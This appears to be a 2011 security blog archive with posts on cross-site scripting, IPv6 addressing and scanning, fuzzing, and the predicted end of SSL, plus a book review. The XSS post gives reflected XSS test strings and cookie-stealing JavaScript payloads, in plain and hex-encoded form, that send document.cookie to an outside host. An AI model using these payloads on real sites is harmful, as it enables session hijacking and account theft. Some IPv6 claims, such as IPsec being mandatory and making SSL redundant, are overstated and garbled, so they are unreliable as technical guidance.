[23] Roese, N. J., & Olson, J. M. (2007). “Better, stronger, faster: Self-serving judgment, affect regulation, and the optimal vigilance hypothesis”. Perspectives on Psychological Science, 2, 124-141.
[24] Shawgo, J., Whitney, N., & Faber S., “CIS Windows XP Professional Benchmark v.2.0.1
[25] The SANS Institute, SANS Top 20, 2007,
[26] The SANS Institute, SANS “Top Cyber Security Risks”, The SANS Institute, “Survival Time History”, 2005, The Internet Storm Centre,
[27] Telang, R., & Wattal, S. (2005). “Impact of software vulnerability announcements on the market value of software vendors -an empirical investigation”. The 4th Annual Workshop on Economics of Information Security (WEIS05). Harvard University.
[28] Varian. H. (2004) “System reliability and free riding. In Economics of Information Security”, L. J. Camp, S. Lewis, eds. (Kluwer Academic Publishers,), vol. 12 of Advances in Information Security, pp. 1-15

[1] See the “Vulnerability testing in analog modem” thread on Security Basics (Securityfocus mailing list).
[2] Metcalf’s law refers to the positive effect that can be related to the value of a network and is expressed as equaling 2x the network’s number of users.

Thursday, 22 September 2011

XSS – Cross Site Scripting

I am leaving this page up as a lesson to myself and to others. Back in 2008 when writing a book, I used some material from CGIsecurity.  I emailed Robert Hansen (Rsnake) of for permission to use some material. He responded OK. I guess he thought I meant his material as I also have a screen shot of his page.

What I did was mix up Robert Hansen and Robert Auger. 

A really dumb newbie mistake that should have been way out of what I did by that stage. The following is left on this page as I have used it without permission. Not as a way of trying to steal another's ideas, but as an exercise in sloth. In place of checking the ownership of the sites correctly, I attributed both Roberts as the one. 

I cannot excuse this, but I was rushed. Hence, this is a lesson in rushing. Trying to complete too much too quickly can lead to problems. I encourage you to learn from my mistake and to ensure that you always double check permission and sources when writing.

In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.
Cross Site Scripting AKA XSS tricks the user into allowing their browser to execute code (well it is automatic really). The browser treats the code as part of the local website and runs it in the same context as that page. XSS attacks targets the browser (user) and not the server.
An XSS attack comes in 4 parts
1.The client application which is fooled into running the code,
2.The server which is used to send the code to the client,
3.The attacker who seeks to gain in targeting the user, and
4.The code the attacker seeks to run on the client.
And some of the common attacks include:

  • Displaying the page differently
  • Stealing Cookies
  • Phishing (redirection of traffic)
  • VPN (End-points) – Dan Kaminsky
  • Port scanning
Types of XSS include reflection and persistent (and a third type I am not covering today).
XSS reflection attacks are simple. Just add the following into a URL:
  • <script>alert(‘XSS’)</script>
Add the same to a POST to a site and the script is returned immediately on the page.
Persistent XSS uses a web site’s message-board features to place scripts in the user’s browser. Commonly used to attack:
  • guest books,
  • classified ads, and
  • social networking
Basically it is an attack against anywhere that user posting is allowed and encouraged.
Cross site scripting (or XSS) allows a web application to assemble malicious data from a user and have the user run code. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will for the most part click on this link from another website, instant message, or commonly spam. Typically the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is not as suspicious when viewed by the user so that they will click on it. Subsequent to the data being collected by the web application, it generates an output page for the user including the malicious data that was initially sent to it, but in a manner to make it appear as valid content from the original website.
Many programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "admin" and read a message by "bill" that contained malicious javascript in it, then it may be possible for "bill" to hijack a session just by reading the post. Another attack can be used to bring about "cookie theft".
There are a number of sites that offer easy Unicode Translators – a code site for SQL follows.
Cookie theft Javascript Examples.
An example from cgisecurity:
http://host/a.php?variable="><script>document.location=' '%20+document.cookie</script>
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.
  1. "><script>document.location='' +document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
  1. <script>document.location='' +document.cookie</script>
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
  1. ><script>document.location='' +document.cookie</script>
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e
These are examples of malicious Javascript. These Javascript examples gather the users cookie and then send a request to the website with the cookie in the query. My script on logs each request and each cookie. In simple terms it is doing the following:
My cookie = user=craig; id=0220
My script =
It sends a request to the site that looks like this.
GET /cgi-bin/cookie.cgi?user=craig;%20id=0220
(Note: %20 is a hex encoding for a space)
Cookie Stealing Code Snippet:
document.location= ''+document.cookie
Non-Persistent Attack
Many web sites use a tailored page and greeting with a "Welcome, ". From time to time the data referencing a logged in user are stored within the query string of a URL and echoed to the screen. For instance:
In the example the username "Craig" is stored in the URL. The resulting web page displays a "Welcome, Craig" message. An attacker could seek to modify the username field in the URL, inserting a cookie-stealing JavaScript. This would make it possible to gain control of the user's account.
Is a web server Vulnerable?
The most effective method to uncover flaws on a web server to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Several different HTML tags can be used to transmit a malicious JavaScript.
Nessus, Nikto, and many other tools can scan a website for these flaws, but can only scratch the surface as there are many ways to check – more than a scanner can be expected to uncover. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.
XSS Protection:
Encoding user supplied output can also defeat XSS vulnerabilities by preventing inserted scripts from being transmitted to users in an executable form. Applications can gain significant protection from javascript based attacks by converting the following characters in all generated output to the appropriate HTML entity encoding:
HTML Entities
Character Encoding
< &lt; or &#60;
> &gt; or &#62;
& &amp; or &#38;
" &quot; or &#34;
' &#39;
( &#40;
) &#41;
# &#35;
% &#37;
; &#59;
+ &#43;
- &#45;
Also, it's crucial to turn off HTTP TRACE support on all web servers.
XSS References

XSS (Cross Site Scripting) Cheat Sheet
One of (if not the) most effective and comprehensive XSS filter lists is available from The XSS (Cross Site Scripting) Cheat Sheet provides a simple web form that can calculate the encoded values for the simplest and most novice attackers.
Figure 1 IP Obfuscation Calculator
Most of the checks in the OWASP 2.0 Guide – distilled into a web page.

Updated from “The IT Regulatory and Standards Compliance Handbook”. Permission was sought and obtained from Robert Hansen (of to use selected material here.

Wednesday, 21 September 2011

IPv6 and CGA

IPv6 incorporates the new concept of privacy extended addresses. These are referred to as CGA (cryptographically generated addresses) and have the goal of maintaining privacy whilst still providing a level of accountability and validation that can be configured by the link administrators.


A CGA [RFC3972] is an IPv6 address, which is bound with the public key of the host where the protection can work via either certificate or local configuration. Manual keying is difficult and is not recommended however.


Using CGA we can ensure that the sender of an NDP (Neighbour Discovery Protocol) message is the owner of the claimed address. Before claiming an address, each node generates a public-private key pair and the CGA option verifies this key. This can be used in reducing the success of several NDP attacks that exist.


SEND (Secure Neighbour Discovery) protocol provisions also allow us to defend against many NDP attacks, but as yet SEND is not widely deployed.


In the most common configuration of CGA, 62 bits are used to store cryptographic hash of a public key. Here, the host ID = HASH62(public_key). We can see the inputs to the Hash in the diagram below.



The capability to embed a security parameter, "sec" in the two rightmost bits of 128-bit Ipv6 address allow the the hash length to be increased in order to improve the security of the mechanism.


In this case, the CGA will have the 64 + 20 x Sec rightmost bits of the hash value equal the concatenation of 20 x Sec zero bits and the interface identifier of the address. While comparing, the two rightmost bits and the universal and group bits are ignored.


More to come…


About the Author:

Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

Google's fuzzing

A response for

@CR, you have stated "Fuzzing tells you nothing about the security of the application".

You could not be more wrong. Fuzzing has dramatically reduced the number of code errors in many major software suites and can cover 80-90% of execution paths.

This is not 100%, but nothing ever is, not even formal verification.

Now, all software has an unknown but fixed number of vulnerabilities at a point in development. This number will change as patches and updates occur, but for each release there are a fixed number of existing vulnerabilities that start as unknown vulnerabilities and are then discovered.

We modelled this in the paper below:

"A Quantitative Analysis into the Economics of Correcting Software Bugs"
Craig S. Wright and Tanveer A. Zia

Basically, the more bugs you find early, the lower the cost of mitigating them. This leaves fewer holes to be exploited and increases the costs of exploiting them.

Security has no absolutes, the notion of an absolute is false in anything we can think of and security is no different, it is only relative. This means it is a risk function. It comes to ecomonics and cost. Increasing the cost to explit software and reducing the cost of a vendor patching and discovering holes thus increases security.

@CR "It is less time consuming to do a careful failure analysis, than attempt random fuzzing."

I assume that you do not now what automation is?

Time costs for people, automation means we can fuzz faster than we can code review.

Also, there are many errors and omissions in any manual code review.

As for @Adobe, they suck as they do not do this, @Google had to do it for them.

As for Apple, they have just as many errors as Microsoft per SLOC, just fewer users.

Tuesday, 20 September 2011

IPv6 - The death of SSL

We see many sites moving more and more to application level encryption such that they can protect the transport of sensitive data. 

IPv6 is THE killer application for SSL. Not that SSL needs help, it is flawed.

IPv6 provides support for encryption within the protocol. This is a key differentiator when we compare it to IPv4 where encryption was provided by the application. IPSec can be used with IPv4. That said, IPSec is tacked onto IPv4, it is fundamental to IPv6. The standards require mandatory IPSEC (with all the associated crypto code), it is not just an add on. IPv6 requires crypto.

On top of that, endpoint authentication is also provided in IPv6, something that was overlooked in IPv4.

IPv6 does not come even close to solving all the world’s security woes and nor could a simple protocol ever attempt to do such. That said, all it needs to do to kill off SSL is to:

  1. Be as effective as SSL or better,
  2. Have a wide deployment.
IPv6 will provide the later point. When IPv6 finally becomes the norm, IPSec will become ubiquitous. It will be deployed far wider than SSL ever was. Next, it simplifies things for developers. Crypto is difficult. Developers make mistakes again and again in implementing crypto. The centralised control and deployment of network crypto is a good thing.

As for being as good or better than SSL, well SSL is flawed. It was from the start and it remains flawed. This point is moot as it would be difficult to make the protocol worse.

IPSec allows the application to call for authentication separate from encryption for use in situations where encryption is prohibited or prohibitively expensive. This is, AH headers can provide integrity and end-point authentication without the overhead of encryption.

For most machines, Intel's decision to incorporate AES processing into the CPU will greatly alleviate the costs of encryption. This will not of course completely remove the CPU costs from large e-commerce websites, but it will make it simpler for the user of such a site.

New, SSL will have a particularly difficult time with many of the extensions that IPv6 is introducing. The new privacy extended IPv6 addresses generated CGA (cryptographically generated addresses) will:
  • maintain privacy
  • add accountability for link administrators
IPv6 will even add a Host ID can be used as a token to access to a network. The big issue is that we will expect multiple addresses per node, so “Who needs spoofing?”

The combination of multiple IP addresses and CGA makes a difficult time for existing implementations of SSL. We could determine to try and fix SSL, but the issue here is simply why?

IPv6 has encryption built in. The IPv6 Security Protocols include:
  • Authentication Header (AH) [RFC4302] and
  • Encapsulating Security Payload (ESP) [RFC4303].
These work through Security Associations. What a SA is and how they work, how they are managed, associated processing are all defined in [RFC4301].

The death knell for SSL really comes as the algorithms for authentication and encryption in IPv6 are defined as being mandatory. These algorithms are defined for use with AH and ESP in [RFC4835] and for IKEv2 in [RFC4307]. Basically, IPv6 already has a tunnelling and transport encryption protocol incorporated that has to be deployed. Why have SSL embedded within IPSec?
AH provides:
  • Integrity.
  • Data origin authentication.
  • Optional (at the discretion of the receiver) anti-replay features.
IPSec implementations MUST support ESP and MAY support AH.

ESP provides:
  • Integrity.
  • Data origin authentication.
  • Optional (at the discretion of the receiver) anti-replay features.
  • Confidentiality (NOT recommended without integrity).
On top of this, each IPSec implementation there is a nominal Security Association Database. The SA contains much more than I have included below, but this covers some of what is necessary for this post:
  • Each entry defines the parameters associated with one SA.
  • Each SA has an entry in the SAD.
  • The SPD has pointers to SAD entries, when IPSec have to be used (PROTECT).
  • Anti-Replay Window: A 64-bit counter and a bit-map (or equivalent) used to determine whether an inbound AH or ESP packet is a replay.
  • AH Information: Authentication algorithms, keys lifetimes etc.

Now, when you consider as well that [RFC4941] describes an extension to IPv6 stateless address auto configuration that makes nodes to generate global-scope addresses that change over time. We have multiple addresses per host that move, update change. We see that this standard allows:
  • The IPv6 addresses on a given interface generated via Stateless Auto configuration contain the same interface ID,
  • Occurs regardless of where within the Internet the device connects, and
  • This facilitates the tracking of individual devices.
Again, why would we bother with SSL?
Once a business starts to see that they have encryption and authentication services at the end-point and over the layer three level to and from the host and server, they will not bother with the notion of application layer security. As such, SSL will become redundant.

Why would a business have both a secure and an open web site? Why would they implement separate controls for email, the web, file sharing and all other applications they run.

No, simply put, SSL is flawed, but at least we can see a slow death as the uptake of IPv6 replaces the existing IP stacks host by host.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

“Network Forensics”: A Review

I have had the good fortune to have been asked to proof and review a forthcoming book by Sherri Davidoff and Jonathan Ham titled Network Forensics. I say good fortune as this is one of the best forensics books I have read and I have read more than a few. More so, this has to be the most comprehensive network forensic tome available.

This book is clear and well written and constructed with many excellent interludes and examples dispersed throughout.

The authors take the reader on a journey through the network layers building an in-depth a deep comprehension of this at times difficult topic. I have to say, this is THE reference volume for anybody involved with incident handling and digital forensics. As we move away from traditional systems of isolated systems and disk based analysis of compromised systems into the interconnectivity of the cloud, Sherri and Jonathon have created a framework and roadmap that will act as a seminal work in this developing field.

The book starts with an easily comprehended introduction into networking and networked systems and takes the reader on a journey through the protocols before it arrives at its destination of imparting an incredible set of knowledge concerning the analysis of network based attacks and incidents. The quantity of information provided is outstanding whilst still managing to remain clear and disambiguous. This book has everything the aspiring network forensic professional needs to know.

This is a must have work for anybody in information security, digital forensics or involved with incident handling. It is not simply a reference, it is a methodology. As they state, “a well-trained forensic investigator should be familiar with a variety of tools and techniques”. Not only do they show you the value of the various tools, they create a framework that instructs the reader when to use these tools.
The best compliment I can give them is that I will be using their book as the foundational text in creating a Masters level course in Network Forensics to complement the existing Masters degree in Digital forensics that we offer at Charles Sturt University.

Monday, 19 September 2011

IPv6–the end of security as we know it.

Many people have seen IPv6 as a simple addressing extension to the existing internet and see few changes to the way we secure systems. These people cannot be further from the truth. IPv6 will change the way we think about security. We need to start planning now or we will be left in the dust.
This is another topic I will be addressing in the coming weeks and months (so many security topics, so little time).

IPv6 substantially changes how IP interacts with the link layer, in particular Ethernet. ARP will go away and be replaced by NDP, which is ICMPv6 based and we also need to look to protocols such as SEND to secure NDP or we will fall prey to the same class of attacks we faced in IPv4 over hub shared networks (and for that matter now in the world of wireless).

I will explain what SEND and NDP are in the next couple posts this week. For now, I ask you to trust me when I say they are important.

First, I will discuss a couple issues that we really need to start planning for. IPv6 has been around for a long time (15 plus years is a long time in IT), but it is only just starting to be widely deployed. The issues we will face need to be addressed now or we will discover holes in our networks and systems and these will be exploited before we even note that they are a concern.

Many of the issues in Security and Risk are really about managing problems before they grow to large. IPv6 is just this, a potential issue as well as a potential benefit. How we manage it determines the outcome.

IPv6 Improvements
There are many improvements to IPv6 when considered against IPv4. Some of the commonly noted ones include:

  • Expanded address space.
  • Extended routing (more levels of addressing hierarchy, simple auto-configuration of addresses).
  • Improved scalability of multicast routing.
  • Simplified header (lesser header fields compared to IPv4 to lower processing costs, dropped header fields are now available as optional extension headers).
  • Support for optional extension headers (allows for faster processing because extension headers are not examined by routers, allows for arbitrary length of IPv6 header).
  • Support for authentication and privacy through encryption.
  • Support for source routes (Source Demand Routing Protocol (SDRP)).
  • Quality of service capabilities.
There are also some less commonly discussed security enhancements that we will cover in the forthcoming posts:
  • New privacy extended IPv6 addresses generated CGA (cryptographically generated addresses)
  1. maintains privacy
  2. accountability possible by link administrators
  • New: Host ID can be used as a token to access to a network.
For today, we will discuss a couple topics that many people have overlooked.

IPv6 and Scanning
The new addressing scheme being implemented with IPv6  implies that the number of available and allocated addresses is REALLY big. So big that the existing methods of Brute force/random scanning makes no sense [RFC5157].

There are ways to discover hosts... but they are not based random scanning any more.
The typical IP/v6 network is issued with a (/64) CIDR. This is why scanning is in practice much less feasible. Also automated attacks, e.g. network worms that pick random host addresses to propagate to, are going to be hampered. When there are 1.84467+19 (this is 1.8 with 19 zeros) host addresses, finding a host in an IPv6 network is 10 billion times more difficult than scanning the entire deployed IPv4 Internet!

Worse, even if we could, it would either end as a DDoS or detection very quickly.
From this, we can see that random scanning network worms will not be feasible. They have been disappearing in any even,but IPv6 spells the end of the random scanning worm.

In IPv6, every Subnet Size is much larger. As noted, default subnets in IPv6 have 2^64 addresses. Exhaustive scan on every address on a subnet is no longer reasonable (if 1,000,000 address per second then > 500,000 years to scan) and even NMAP support for IPv6 network scanning is limited.
Worse, the new privacy extended CGA IPv6 addresses are regenerated faster than they can be scanned. We will cover this in coming posts.

IPv6 Scanning methods are HAVE to change

Public servers will still need to be DNS reachable giving attacker some hosts to attack. As such, DNS will become even more of a target than it ever has been. Not only is DNS an attack vector, it is one of the few means to recon hosts. DNSSec is critical now.

Zone transfer and interception attacks will be more and more common when IPv6 starts to be widely deployed. It is one of the simplest methods of discovering hosts. It is about time we start to Deny DNS zone transfers! DNS splitting is more important than ever with IPv6.

The next issue is human as always. Administrators may adopt easy to remember addresses (::1,::2,::53, or simply IPv4 last octet) to simplify management as they did with IPv4. This is a bad approach. In IPv6 we need to start using the multicast registration controls and learn to manage systems by their multicast groups.

Other un-thought-of scanning methodologies will come as EUI-64 address has “fixed part” and the Ethernet card vendors address (the MAC) can be guessed. The 48 bits in a MAC are not random and the pool of numbers in this are far smaller than the implied 2^48 bits.

This also means we will find new techniques to harvest addresses being developed by attackers. Addresses can be  harvested from logs and DNS zones and these will become the target of attacks in their own right.

Further, in compromising routers at key transit points in a network, an attacker can learn new addresses to scan. The difficult part of scanning in IPv6 is finding the host. Once the host is discovered, it can be attacked as normal (with some exceptions based on mobility controls).

The multicast groups also great a target. A new attack vector is created in order to discover routers hen we look at multicast groups such as “All node/router …. addresses”. IPv6 supports new multicast addresses that can enable an attacker to identify key resources on a network and attack them. For example,
  • all nodes (FF02::1),
  • all routers (FF05::2) and
  • all DHCP servers (FF05::5)
If multicasts are not secured, the attacker can recon a network and bypass the need to discover hosts the hard way. As a result, it is really important that these addresses are filtered at the border in order to make them unreachable from the outside. This should be set as a default if no IPv6 multicasting is enabled. The difficulty here is that IPv6 creates diffused networks.

Firewalls will also change in radical ways.

The death of SSL
Next, there is one area I have seen very little (if anything) on so far. This is how IPv6 will destroy the notion of application based security.

I will address this in more depth tomorrow, but the thing to think about is that IPv6 has mandatory support for IPv6 and a cryptographically based host identification and authorisation scheme.
This makes SSL, TLS and other protocol redundant.

More, application layer encryption is based on the encryption stack in the application. Each time we re-deploy the same crypto requirements over and over, we add more avenues for mistakes. Crypto is hard. If we can do it once in the O/S and not at each layer we all win.

The conclusion…. for today
Basically, IPv6 can make us more secure, but only if we do it right. Web attacks will not go away and NULL (or 0-bit encryption cyphers) can still be deployed by unobservant administrators, but there is a way forward if we start planning now.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

(Crime / Espionage / Terror) Webinar Series.

The first Lecture is up and publically available:
The Second Cyber (Crime / Espionage / Terror) Webinar is also online and available. It can be accessed at the following URL:
And you can reserve your Webinar seat now for the third lecture this coming Friday at: